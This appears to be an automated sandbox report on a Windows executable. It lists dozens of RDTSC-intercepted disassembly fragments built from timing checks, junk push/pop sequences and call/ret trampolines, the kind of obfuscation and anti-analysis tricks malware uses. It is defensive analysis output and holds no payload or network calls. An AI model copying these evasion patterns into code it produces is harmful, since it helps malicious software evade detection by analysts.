    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A597B7 second address: A597C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F5100C93C0Ah 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A597C7 second address: A597E5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5100BF03F4h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A597E5 second address: A597E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A597E9 second address: A5981B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5100BF03F3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a jl 00007F5100BF0404h 0x00000010 jne 00007F5100BF03ECh 0x00000016 js 00007F5100BF03E6h 0x0000001c push eax 0x0000001d push edx 0x0000001e ja 00007F5100BF03E6h 0x00000024 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A59A9B second address: A59AD4 instructions: 0x00000000 rdtsc 0x00000002 je 00007F5100C93C06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F5100C93C15h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jng 00007F5100C93C17h 0x00000018 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A59AD4 second address: A59AF3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5100BF03ECh 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F5100BF03EDh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A59AF3 second address: A59AF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A59C56 second address: A59C79 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5100BF03EEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jc 00007F5100BF03EEh 0x00000012 jo 00007F5100BF03E6h 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A59C79 second address: A59C7E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5C58B second address: A5C679 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F5100BF03E8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c add dword ptr [esp], 18986D12h 0x00000013 mov edx, dword ptr [ebp+122D2E7Ah] 0x00000019 push 00000003h 0x0000001b pushad 0x0000001c add eax, dword ptr [ebp+122D1B27h] 0x00000022 movzx edx, si 0x00000025 popad 0x00000026 push 00000000h 0x00000028 mov dword ptr [ebp+122D1B3Dh], edi 0x0000002e push 00000003h 0x00000030 push 00000000h 0x00000032 push ecx 0x00000033 call 00007F5100BF03E8h 0x00000038 pop ecx 0x00000039 mov dword ptr [esp+04h], ecx 0x0000003d add dword ptr [esp+04h], 0000001Bh 0x00000045 inc ecx 0x00000046 push ecx 0x00000047 ret 0x00000048 pop ecx 0x00000049 ret 0x0000004a pushad 0x0000004b push esi 0x0000004c mov dword ptr [ebp+122D183Ch], eax 0x00000052 pop eax 0x00000053 call 00007F5100BF03F3h 0x00000058 pop esi 0x00000059 popad 0x0000005a jmp 00007F5100BF03F8h 0x0000005f call 00007F5100BF03E9h 0x00000064 jmp 00007F5100BF03EEh 0x00000069 push eax 0x0000006a jmp 00007F5100BF03F5h 0x0000006f mov eax, dword ptr [esp+04h] 0x00000073 push esi 0x00000074 jmp 00007F5100BF03F6h 0x00000079 pop esi 0x0000007a mov eax, dword ptr [eax] 0x0000007c push eax 0x0000007d push edx 0x0000007e jmp 00007F5100BF03F8h 0x00000083 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5C679 second address: A5C69A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5100C93C0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jl 00007F5100C93C0Ch 0x00000015 jno 00007F5100C93C06h 0x0000001b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5C733 second address: A5C738 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5C738 second address: A5C73D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5C73D second address: A5C7AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007F5100BF03F4h 0x0000000d nop 0x0000000e js 00007F5100BF03ECh 0x00000014 mov esi, dword ptr [ebp+122D2E26h] 0x0000001a push 00000000h 0x0000001c push 00000000h 0x0000001e push edi 0x0000001f call 00007F5100BF03E8h 0x00000024 pop edi 0x00000025 mov dword ptr [esp+04h], edi 0x00000029 add dword ptr [esp+04h], 00000018h 0x00000031 inc edi 0x00000032 push edi 0x00000033 ret 0x00000034 pop edi 0x00000035 ret 0x00000036 jmp 00007F5100BF03F9h 0x0000003b push 0683370Fh 0x00000040 pushad 0x00000041 pushad 0x00000042 push ebx 0x00000043 pop ebx 0x00000044 push eax 0x00000045 push edx 0x00000046 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5C7AC second address: A5C7B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 ja 00007F5100C93C06h 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5C7B9 second address: A5C83A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5100BF03F7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a xor dword ptr [esp], 0683378Fh 0x00000011 xor dword ptr [ebp+122D1BC4h], eax 0x00000017 mov ecx, dword ptr [ebp+122D2E0Eh] 0x0000001d push 00000003h 0x0000001f push 00000000h 0x00000021 push ecx 0x00000022 call 00007F5100BF03E8h 0x00000027 pop ecx 0x00000028 mov dword ptr [esp+04h], ecx 0x0000002c add dword ptr [esp+04h], 00000014h 0x00000034 inc ecx 0x00000035 push ecx 0x00000036 ret 0x00000037 pop ecx 0x00000038 ret 0x00000039 mov edi, edx 0x0000003b and edx, dword ptr [ebp+122D2E26h] 0x00000041 push 00000000h 0x00000043 jmp 00007F5100BF03F5h 0x00000048 push 00000003h 0x0000004a mov edx, esi 0x0000004c call 00007F5100BF03E9h 0x00000051 pushad 0x00000052 push esi 0x00000053 pushad 0x00000054 popad 0x00000055 pop esi 0x00000056 pushad 0x00000057 push eax 0x00000058 push edx 0x00000059 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5C83A second address: A5C840 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5C840 second address: A5C84B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5C84B second address: A5C87B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push edi 0x00000008 jmp 00007F5100C93C10h 0x0000000d pop edi 0x0000000e popad 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 pushad 0x00000014 pushad 0x00000015 jl 00007F5100C93C06h 0x0000001b jg 00007F5100C93C06h 0x00000021 popad 0x00000022 pushad 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5C87B second address: A5C8BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 popad 0x00000008 mov eax, dword ptr [eax] 0x0000000a jmp 00007F5100BF03F9h 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 jmp 00007F5100BF03F6h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5C8BD second address: A5C8C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5C8C2 second address: A5C8FC instructions: 0x00000000 rdtsc 0x00000002 jp 00007F5100BF03E8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b push ecx 0x0000000c jl 00007F5100BF03EBh 0x00000012 mov edx, 5955459Ah 0x00000017 pop edi 0x00000018 lea ebx, dword ptr [ebp+1244C45Ah] 0x0000001e xchg eax, ebx 0x0000001f pushad 0x00000020 jmp 00007F5100BF03F4h 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 popad 0x00000029 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5C8FC second address: A5C900 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5C900 second address: A5C912 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jng 00007F5100BF03E6h 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5C912 second address: A5C918 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5C9B7 second address: A5C9D8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jl 00007F5100BF03F3h 0x00000014 jmp 00007F5100BF03EDh 0x00000019 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5C9D8 second address: A5C9E2 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F5100C93C0Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5C9E2 second address: A5C9EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 pushad 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5C9EE second address: A5CAA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007F5100C93C19h 0x0000000a popad 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f jno 00007F5100C93C12h 0x00000015 pop eax 0x00000016 sub edi, 1F518FE0h 0x0000001c push 00000003h 0x0000001e push 00000000h 0x00000020 push esi 0x00000021 call 00007F5100C93C08h 0x00000026 pop esi 0x00000027 mov dword ptr [esp+04h], esi 0x0000002b add dword ptr [esp+04h], 0000001Ch 0x00000033 inc esi 0x00000034 push esi 0x00000035 ret 0x00000036 pop esi 0x00000037 ret 0x00000038 push 00000000h 0x0000003a mov edx, esi 0x0000003c push 00000003h 0x0000003e push F6598288h 0x00000043 jmp 00007F5100C93C0Ch 0x00000048 xor dword ptr [esp], 36598288h 0x0000004f mov dword ptr [ebp+122D3371h], edx 0x00000055 lea ebx, dword ptr [ebp+1244C465h] 0x0000005b push 00000000h 0x0000005d push esi 0x0000005e call 00007F5100C93C08h 0x00000063 pop esi 0x00000064 mov dword ptr [esp+04h], esi 0x00000068 add dword ptr [esp+04h], 00000018h 0x00000070 inc esi 0x00000071 push esi 0x00000072 ret 0x00000073 pop esi 0x00000074 ret 0x00000075 sub si, DFF8h 0x0000007a xchg eax, ebx 0x0000007b push edx 0x0000007c push eax 0x0000007d push edx 0x0000007e pushad 0x0000007f popad 0x00000080 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7BB20 second address: A7BB29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7BB29 second address: A7BB2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7BB2F second address: A7BB33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7BC93 second address: A7BC99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7BC99 second address: A7BCBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5100BF03F8h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7BCBA second address: A7BCC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F5100C93C06h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7BCC4 second address: A7BCC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7BCC8 second address: A7BCCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7BCCE second address: A7BCD3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7BCD3 second address: A7BCDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7BCDB second address: A7BCF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F5100BF03E6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F5100BF03EFh 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7BE5C second address: A7BE7A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5100C93C15h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7BE7A second address: A7BE81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7C0FB second address: A7C101 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7C261 second address: A7C267 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7C267 second address: A7C26D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7C26D second address: A7C271 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7CB2F second address: A7CB33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7CB33 second address: A7CB40 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F5100BF03E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A738B2 second address: A738CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F5100C93C0Eh 0x0000000a jnp 00007F5100C93C06h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A738CD second address: A738DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 je 00007F5100BF03E6h 0x0000000c push edi 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A738DD second address: A738EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jno 00007F5100C93C06h 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7D43B second address: A7D441 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7D703 second address: A7D707 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8113B second address: A81155 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F5100BF03F4h 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A81155 second address: A81161 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F5100C93C0Eh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A84468 second address: A84476 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F5100BF03E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A84476 second address: A8447A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8469C second address: A846BA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F5100BF03F2h 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A84850 second address: A84861 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 ja 00007F5100C93C08h 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A88AFA second address: A88B00 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A886AB second address: A886B5 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F5100C93C06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A88849 second address: A8884F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8BB4B second address: A8BB5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop esi 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8C0B4 second address: A8C0B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8C690 second address: A8C6A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5100C93C11h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8CBBD second address: A8CC15 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d mov dword ptr [ebp+122D186Eh], ebx 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push eax 0x00000018 call 00007F5100BF03E8h 0x0000001d pop eax 0x0000001e mov dword ptr [esp+04h], eax 0x00000022 add dword ptr [esp+04h], 00000017h 0x0000002a inc eax 0x0000002b push eax 0x0000002c ret 0x0000002d pop eax 0x0000002e ret 0x0000002f and edi, 69E5C1D1h 0x00000035 mov dword ptr [ebp+122D1D8Ch], ebx 0x0000003b xchg eax, ebx 0x0000003c jp 00007F5100BF03F0h 0x00000042 push eax 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 pushad 0x00000048 popad 0x00000049 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8CC15 second address: A8CC19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8CC19 second address: A8CC1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A907B3 second address: A907B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A91E0E second address: A91E13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A91E13 second address: A91E9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jnl 00007F5100C93C06h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e pushad 0x0000000f push edx 0x00000010 pop edx 0x00000011 push edx 0x00000012 pop edx 0x00000013 popad 0x00000014 push edi 0x00000015 js 00007F5100C93C06h 0x0000001b pop edi 0x0000001c popad 0x0000001d nop 0x0000001e mov esi, dword ptr [ebp+122D2DB2h] 0x00000024 push 00000000h 0x00000026 push 00000000h 0x00000028 push ebp 0x00000029 call 00007F5100C93C08h 0x0000002e pop ebp 0x0000002f mov dword ptr [esp+04h], ebp 0x00000033 add dword ptr [esp+04h], 0000001Ah 0x0000003b inc ebp 0x0000003c push ebp 0x0000003d ret 0x0000003e pop ebp 0x0000003f ret 0x00000040 mov dword ptr [ebp+122D3ACFh], eax 0x00000046 jg 00007F5100C93C0Ch 0x0000004c push 00000000h 0x0000004e mov esi, dword ptr [ebp+122D2C86h] 0x00000054 call 00007F5100C93C0Fh 0x00000059 mov dword ptr [ebp+122D1B3Dh], ecx 0x0000005f pop esi 0x00000060 xchg eax, ebx 0x00000061 push eax 0x00000062 push edx 0x00000063 pushad 0x00000064 jns 00007F5100C93C06h 0x0000006a jp 00007F5100C93C06h 0x00000070 popad 0x00000071 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9295A second address: A92963 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A92963 second address: A929DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push eax 0x00000007 jmp 00007F5100C93C0Ch 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push eax 0x00000010 call 00007F5100C93C08h 0x00000015 pop eax 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a add dword ptr [esp+04h], 00000019h 0x00000022 inc eax 0x00000023 push eax 0x00000024 ret 0x00000025 pop eax 0x00000026 ret 0x00000027 mov edi, 46129C9Eh 0x0000002c push 00000000h 0x0000002e mov dword ptr [ebp+122D18F5h], edi 0x00000034 push 00000000h 0x00000036 push 00000000h 0x00000038 push ebp 0x00000039 call 00007F5100C93C08h 0x0000003e pop ebp 0x0000003f mov dword ptr [esp+04h], ebp 0x00000043 add dword ptr [esp+04h], 0000001Ch 0x0000004b inc ebp 0x0000004c push ebp 0x0000004d ret 0x0000004e pop ebp 0x0000004f ret 0x00000050 je 00007F5100C93C0Ch 0x00000056 mov esi, dword ptr [ebp+122D1BAEh] 0x0000005c push eax 0x0000005d push eax 0x0000005e push edx 0x0000005f pushad 0x00000060 push edx 0x00000061 pop edx 0x00000062 push eax 0x00000063 push edx 0x00000064 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A929DF second address: A929E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9323F second address: A93243 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9541A second address: A9545B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F5100BF03EAh 0x00000010 push eax 0x00000011 jmp 00007F5100BF03F4h 0x00000016 jmp 00007F5100BF03F6h 0x0000001b pop eax 0x0000001c rdtsc
